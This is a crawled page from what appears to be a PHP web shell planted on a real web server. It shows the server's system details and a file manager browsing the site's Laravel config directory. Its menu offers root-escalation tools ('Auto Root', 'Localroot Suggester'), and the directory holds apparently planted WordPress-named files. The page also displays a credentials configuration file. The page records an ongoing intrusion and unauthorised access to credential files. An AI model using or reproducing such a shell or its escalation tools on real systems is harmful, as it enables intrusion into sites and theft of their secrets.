Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
softmedya.net /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
.trash7206
[ DIR ]
drwxr-xr-x
2025-12-13 08:15
.htaccess
197
B
-r--r--r--
2025-12-13 08:58
app.php
4.17
KB
-rw-r--r--
2025-10-02 07:30
auth.php
3.93
KB
-rw-r--r--
2025-10-02 07:30
cache.php
3.4
KB
-rw-r--r--
2025-10-02 07:30
database.php
6.69
KB
-rw-r--r--
2025-10-02 07:30
filesystems.php
2.44
KB
-rw-r--r--
2025-10-02 07:30
logging.php
4.23
KB
-rw-r--r--
2025-10-02 07:30
mail.php
3.53
KB
-rw-r--r--
2025-10-02 07:30
queue.php
3.73
KB
-rw-r--r--
2025-10-02 07:30
services.php
1.01
KB
-rw-r--r--
2025-10-02 07:30
session.php
7.66
KB
-rw-r--r--
2025-10-02 07:30
wp-blog-header.php
2.74
KB
-rw-r--r--
2025-12-13 08:58
wp-cron.php
2.74
KB
-rw-r--r--
2025-12-13 08:58
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Third Party Services |-------------------------------------------------------------------------- | | This file is for storing the credentials for third party services such | as Mailgun, Postmark, AWS and more. This file provides the de facto | location for this type of information, allowing packages to have | a conventional file to locate the various service credentials. | */ 'postmark' => [ 'token' => env('POSTMARK_TOKEN'), ], 'resend' => [ 'key' => env('RESEND_KEY'), ], 'ses' => [ 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), ], 'slack' => [ 'notifications' => [ 'bot_user_oauth_token' => env('SLACK_BOT_USER_OAUTH_TOKEN'), 'channel' => env('SLACK_BOT_USER_DEFAULT_CHANNEL'), ], ], ];